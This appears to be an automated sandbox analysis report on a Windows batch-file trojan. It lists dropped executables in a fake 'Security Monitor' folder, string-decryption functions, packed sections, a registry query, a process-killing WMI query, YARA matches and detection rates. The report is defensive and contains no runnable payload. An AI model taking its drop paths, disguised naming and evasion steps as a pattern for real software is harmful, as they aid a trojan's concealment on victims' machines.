Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_0A2FAFC8	6_2_0A2FAFC8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033E6654	53_2_033E6654
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033FE88C	53_2_033FE88C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033F1D50	53_2_033F1D50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033D110C	53_2_033D110C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033D0538	53_2_033D0538
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D2B890	67_2_00D2B890
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D220F0	67_2_00D220F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D1A132	67_2_00D1A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D8A140	67_2_00D8A140
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D34170	67_2_00D34170
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D1A132	67_2_00D1A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D80130	67_2_00D80130
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00F8A250	67_2_00F8A250
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D6A340	67_2_00D6A340
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D3F5D0	67_2_00D3F5D0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D3E590	67_2_00D3E590
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00F985B0	67_2_00F985B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D476C0	67_2_00D476C0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D666B0	67_2_00D666B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D336A0	67_2_00D336A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D20620	67_2_00D20620
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D6A7B0	67_2_00D6A7B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D29A20	67_2_00D29A20
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D88C20	67_2_00D88C20
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D1A132	67_2_00D1A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D26F90	67_2_00D26F90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D11F10	67_2_00D11F10
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4

Found potential string decryption / allocating functions

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: String function: 033E565C appears 36 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00D46FB0 appears 179 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00D47140 appears 127 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00D23610 appears 43 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00D23380 appears 46 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00D13850 appears 34 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00D19DB0 appears 70 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00D19DE0 appears 31 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00F9D1E8 appears 58 times

PE file contains executable resources (Code or Archives)

Source: [space]= .tmp.18.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: [space]= .tmp.18.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-269PL.tmp.19.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-269PL.tmp.19.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-9ATRT.tmp.19.dr	Static PE information: Resource name: RT_BITMAP type: DOS executable (COM)
Source: is-9ATRT.tmp.19.dr	Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: is-9ATRT.tmp.19.dr	Static PE information: Resource name: RT_RCDATA type: COM executable for DOS

PE file contains more sections than normal

Source: is-IFJUI.tmp.19.dr	Static PE information: Number of sections : 18 > 10
Source: is-V94IU.tmp.19.dr	Static PE information: Number of sections : 11 > 10
Source: is-9ATRT.tmp.19.dr	Static PE information: Number of sections : 13 > 10
Source: ffws.exe.53.dr	Static PE information: Number of sections : 11 > 10
Source: is-JF90R.tmp.19.dr	Static PE information: Number of sections : 13 > 10

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"

Source: [space]= .exe.5.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: is-JF90R.tmp.19.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: is-9ATRT.tmp.19.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: is-JF90R.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0016526442307692
Source: is-JF90R.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0005696614583333
Source: is-JF90R.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0007161458333333
Source: is-JF90R.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.021484375
Source: is-JF90R.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0003823138297872
Source: is-9ATRT.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0017903645833333
Source: is-9ATRT.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0005696614583333
Source: is-9ATRT.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0008680555555556
Source: is-9ATRT.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.021484375
Source: is-9ATRT.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0003551136363635

Source: [space]= .exe.5.dr, Settings.cs

Source: classification engine

Classification label: mal100.troj.evad.winBAT@190/1078@15/9

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 67_2_00D2A2A0 GetLastError,_errno,strncpy,FormatMessageA,strrchr,strrchr,_errno,_errno,GetLastError,SetLastError,

67_2_00D2A2A0

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033C7898 GetDiskFreeSpaceA,

53_2_033C7898

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 67_2_00D13700 memset,GetLastError,CreateToolhelp32Snapshot,GetLastError,Module32First,Module32Next,CloseHandle,

67_2_00D13700

Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\[space]= .exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\181531736511434

Jump to behavior

Source: Yara match	File source: 73.0.spmm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000049.00000000.2712353086.0000000000401000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-3JAMQ.tmp, type: DROPPED

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\c5WMpr1cOc.bat" "

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"

Source: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmd.exe" OR Caption = "wlg.exe" OR Caption = "spmm.exe" OR Caption = "spkl.exe" OR Caption = "spm.exe" OR Caption = "sem.exe" OR Caption = "clv.exe" OR Caption = "akl.exe" OR Caption = "sps.exe" OR Caption = "sime64.exe" OR Caption = "ff.exe" OR Caption = "mrec.exe" OR Caption = "clvhost.exe" OR Caption = "ffws.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SPMM.EXE'
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmd.exe" OR Caption = "wlg.exe" OR Caption = "spmm.exe" OR Caption = "spkl.exe" OR Caption = "spm.exe" OR Caption = "sem.exe" OR Caption = "clv.exe" OR Caption = "akl.exe" OR Caption = "sps.exe" OR Caption = "sime64.exe" OR Caption = "ff.exe" OR Caption = "mrec.exe" OR Caption = "clvhost.exe" OR Caption = "ffws.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SPS.EXE'
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SPM.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SEM.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SPKL.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'CLV.EXE'

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\reg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: spkl.exe, 00000035.00000002.2984780387.0000000007DBC000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2980946676.0000000006C06000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE if not exists `wlog` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,`sTime`TEXT,`sJSon`TEXT);
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: c5WMpr1cOc.bat	Virustotal: Detection: 19%
Source: c5WMpr1cOc.bat	ReversingLabs: Detection: 26%

Source: spkl.exe	String found in binary or memory: NATS-SEFI-ADD
Source: spkl.exe	String found in binary or memory: NATS-DANO-ADD
Source: spkl.exe	String found in binary or memory: JIS_C6229-1984-b-add
Source: spkl.exe	String found in binary or memory: jp-ocr-b-add
Source: spkl.exe	String found in binary or memory: JIS_C6229-1984-hand-add
Source: spkl.exe	String found in binary or memory: jp-ocr-hand-add
Source: spkl.exe	String found in binary or memory: ISO_6937-2-add
Source: qrl.exe	String found in binary or memory: id-cmc-addExtensions
Source: qrl.exe	String found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: qrl.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: qrl.exe	String found in binary or memory: set-addPolicy
Source: qrl.exe	String found in binary or memory: dns-ipv6-addr
Source: qrl.exe	String found in binary or memory: dns-ipv4-addr
Source: qrl.exe	String found in binary or memory: false-start
